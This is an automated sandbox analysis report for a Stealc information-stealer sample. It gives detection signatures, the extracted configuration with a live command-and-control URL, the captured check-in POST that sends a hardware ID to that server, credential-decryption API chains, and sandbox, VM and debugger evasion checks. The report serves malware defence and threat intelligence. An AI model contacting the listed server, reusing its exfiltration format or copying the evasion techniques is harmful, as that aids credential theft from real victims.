Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1520716
MD5:f413d695f62b9d29686880be5daedb80
SHA1:5680fc5f5fd1689a5aa2d0682434b5c20f6784bc
SHA256:5a8c2a4536f6c77609a753f916c001d169f7746b3cca7aee87ac4b0a2422ac03
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6800 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F413D695F62B9D29686880BE5DAEDB80)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2133666234.00000000019BE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2092431319.0000000005610000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6800JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6800JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.c30000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-27T19:04:09.324295+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.c30000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00C3C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C39AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00C39AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C37240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00C37240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C39B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00C39B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C48EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00C48EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00C438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C44910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C44910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00C3DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00C3E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C44570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00C44570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00C3ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C316D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3F68A FindFirstFileA,0_2_00C3F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C43EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00C43EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C3F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00C3BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C3DE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHCBAFIDAECBGCBFHJEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 37 31 46 44 32 38 45 30 30 43 39 33 37 34 30 31 30 35 32 38 31 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 2d 2d 0d 0a Data Ascii: ------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="hwid"671FD28E00C93740105281------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="build"save------IEHCBAFIDAECBGCBFHJE--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C34880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00C34880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHCBAFIDAECBGCBFHJEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 37 31 46 44 32 38 45 30 30 43 39 33 37 34 30 31 30 35 32 38 31 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 2d 2d 0d 0a Data Ascii: ------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="hwid"671FD28E00C93740105281------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="build"save------IEHCBAFIDAECBGCBFHJE--
                Source: file.exe, 00000000.00000002.2133666234.00000000019BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2133666234.0000000001A02000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133666234.0000000001A19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2133666234.0000000001A02000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133666234.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133666234.0000000001A19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2133666234.0000000001A19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php/
                Source: file.exe, 00000000.00000002.2133666234.0000000001A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php;
                Source: file.exe, 00000000.00000002.2133666234.0000000001A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpK
                Source: file.exe, 00000000.00000002.2133666234.0000000001A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpXN
                Source: file.exe, 00000000.00000002.2133666234.0000000001A19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpw
                Source: file.exe, 00000000.00000002.2133666234.0000000001A19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010059840_2_01005984
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E9E0360_2_00E9E036
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECA1FD0_2_00ECA1FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF99930_2_00FF9993
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA49870_2_00EA4987
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010188A10_2_010188A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F67AEB0_2_00F67AEB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01007B4C0_2_01007B4C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100C25F0_2_0100C25F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFEB580_2_00FFEB58
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB5B2E0_2_00FB5B2E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010022D60_2_010022D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100DD3D0_2_0100DD3D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01008D480_2_01008D48
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EFD5FE0_2_00EFD5FE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010007440_2_01000744
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F91E780_2_00F91E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100F7820_2_0100F782
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFC63F0_2_00FFC63F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100A7D20_2_0100A7D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFCFF00_2_00FFCFF0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011206480_2_01120648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01003EBF0_2_01003EBF
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00C345C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: cgvssnvn ZLIB complexity 0.9948659202904002
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C48680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00C48680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C43720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00C43720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\WTS7MIR6.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1858048 > 1048576
                Source: file.exeStatic PE information: Raw size of cgvssnvn is bigger than: 0x100000 < 0x19f600

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.c30000.0.unpack :EW;.rsrc :W;.idata :W; :EW;cgvssnvn:EW;oemmexyc:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;cgvssnvn:EW;oemmexyc:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C49860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cfe90 should be: 0x1d131c
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: cgvssnvn
                Source: file.exeStatic PE information: section name: oemmexyc
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010CE100 push edi; mov dword ptr [esp], eax0_2_010CE104
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0109A143 push 67B32BF8h; mov dword ptr [esp], edi0_2_0109A15E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010AE144 push edi; mov dword ptr [esp], 0D6F5201h0_2_010AE148
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push ecx; mov dword ptr [esp], eax0_2_01005989
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push edi; mov dword ptr [esp], ebx0_2_010059D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push edx; mov dword ptr [esp], 7CF6357Ch0_2_01005A34
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push 1A0C36FAh; mov dword ptr [esp], esi0_2_01005A8A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push 3C81E910h; mov dword ptr [esp], ebp0_2_01005AF1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push 5655675Bh; mov dword ptr [esp], edx0_2_01005B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push eax; mov dword ptr [esp], ebx0_2_01005B76
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push 36F8C9A1h; mov dword ptr [esp], esi0_2_01005B7E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push 4312908Ch; mov dword ptr [esp], eax0_2_01005BB7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push ecx; mov dword ptr [esp], esp0_2_01005C5B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push ebx; mov dword ptr [esp], ebp0_2_01005C74
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push esi; mov dword ptr [esp], edi0_2_01005C80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push edi; mov dword ptr [esp], 00000004h0_2_01005C84
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push ebx; mov dword ptr [esp], esi0_2_01005CEB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push edx; mov dword ptr [esp], 1F776BF6h0_2_01005CF3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push 676C4EFEh; mov dword ptr [esp], edx0_2_01005D2A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push 72095A22h; mov dword ptr [esp], edx0_2_01005D3D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push ecx; mov dword ptr [esp], edi0_2_01005D67
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push edi; mov dword ptr [esp], esp0_2_01005D6B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push 14A2C230h; mov dword ptr [esp], edx0_2_01005D7B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push 3809FB90h; mov dword ptr [esp], edi0_2_01005E2E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push ebx; mov dword ptr [esp], 614D0897h0_2_01005E35
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push esi; mov dword ptr [esp], 369E8595h0_2_01005E46
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push edx; mov dword ptr [esp], ecx0_2_01005F1C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push 36BA9B59h; mov dword ptr [esp], ebp0_2_01005F24
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push ebx; mov dword ptr [esp], 350E85B7h0_2_01005F5B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push 5D3F73C2h; mov dword ptr [esp], edx0_2_01006005
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01005984 push 0C91E582h; mov dword ptr [esp], ebp0_2_01006081
                Source: file.exeStatic PE information: section name: cgvssnvn entropy: 7.9531873822886014

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C49860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13482
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10144B1 second address: 10144C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 je 00007F0C5CC49424h 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F0C5CC49416h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013448 second address: 101344D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003983 second address: 1003987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013C71 second address: 1013CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0C5CE44006h 0x0000000a pop edi 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jp 00007F0C5CE44006h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 jmp 00007F0C5CE44017h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013CA5 second address: 1013CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013CAC second address: 1013CB3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1016405 second address: 1016409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1016409 second address: 101642A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CE44019h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
